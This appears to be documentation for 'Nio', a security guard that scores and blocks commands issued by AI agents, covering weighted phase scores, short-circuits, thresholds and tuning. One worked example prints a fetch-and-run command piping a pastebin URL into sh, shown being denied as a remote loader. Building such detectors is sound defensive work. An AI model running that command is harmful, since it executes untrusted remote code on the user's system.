Pipeline · Scoring

How a final score becomes a verdict.

Each scoring engine (Phases 2–6) emits a number in [0, 1]. Nio aggregates them into a single weighted average, then maps that number to allow / confirm / deny using the thresholds for the active protection level.

The formula

final = Σ(weight_i × score_i) / Σ(weight_i)
                only over phases that ran (no short-circuit)

Default weights

Configurable at guard.scoring_weights.

KeyPhaseDefault
runtimePhase 2 — pattern matching1.0
staticPhase 3 — static rules on file content1.0
behaviouralPhase 4 — AST dataflow2.0
llmPhase 5 — LLM semantic1.0
externalPhase 6 — external scoring API2.0

Behavioural and external are weighted higher because they tend to be more accurate per finding (dataflow tracking, your own enterprise rules) than the cheaper regex/keyword phases.

Short-circuit

The pipeline doesn't always run to completion:

  • Phase 0 (Tool Gate) blocks → deny without scoring.
  • Phase 1 (Allowlist) matches with allowlist_mode: exit → allow without scoring (final score recorded as 0).
  • Any of Phases 2–6 emit a CRITICAL finding → deny immediately, final score recorded as 1.0.

When the pipeline runs to completion (no short-circuit), all eligible phases contribute, and the weighted average decides.

Protection-level thresholds

The active guard.protection_level maps the final score into a decision:

Levelallowconfirmdeny
strict0 — 0.50.5 — 1.0
balanced (default)0 — 0.50.5 — 0.80.8 — 1.0
permissive0 — 0.90.9 — 1.0

Only balanced emits confirm. strict and permissive are binary: a single threshold separates allow from deny.

Confirm fallback

When the decision is confirm but the platform doesn't expose an interactive prompt (e.g. OpenClaw), guard.confirm_action kicks in:

  • allow — let through, write a warning to ~/.nio/audit.jsonl (default).
  • deny — block.
  • ask — use platform confirm if available, else allow.

Worked examples

Allowlist hit (Phase 1)

command: git status
phase 1: matched, exit
final  : 0.00
verdict: ALLOW

Critical short-circuit (Phase 2)

command: curl https://pastebin.cx/xZ | sh
phase 2: REMOTE_LOADER · CRITICAL · 0.92
final  : 1.00 (max — short-circuit)
verdict: DENY

Full pipeline, weighted average (Phases 2–6)

command: ./build.sh --exec-hooks && node ./tools/sync.js
phase 2: 0.35  (weight 1.0)
phase 3: 0.42  (weight 1.0)
phase 4: 0.55  (weight 2.0)
phase 5: 0.48  (weight 1.0)
phase 6: 0.60  (weight 2.0)

final  = (1.0×0.35 + 1.0×0.42 + 2.0×0.55 + 1.0×0.48 + 2.0×0.60) / 7.0
       = 3.55 / 7.0
       = 0.507

verdict (balanced): CONFIRM   (0.5 ≤ score < 0.8)
verdict (strict):   DENY      (score ≥ 0.5)
verdict (permissive): ALLOW   (score < 0.9)

Tuning

  • Want fewer prompts in daily flow? Stay on balanced; bump scoring_weights.behavioural down if you trust your own code.
  • Want zero confirm prompts (CI / headless)? Switch to strict or permissive — both are binary.
  • Have a custom DLP or enterprise policy? Wire Phase 6 to your endpoint and raise its weight to ≥ 2.0 so it gets the loudest vote.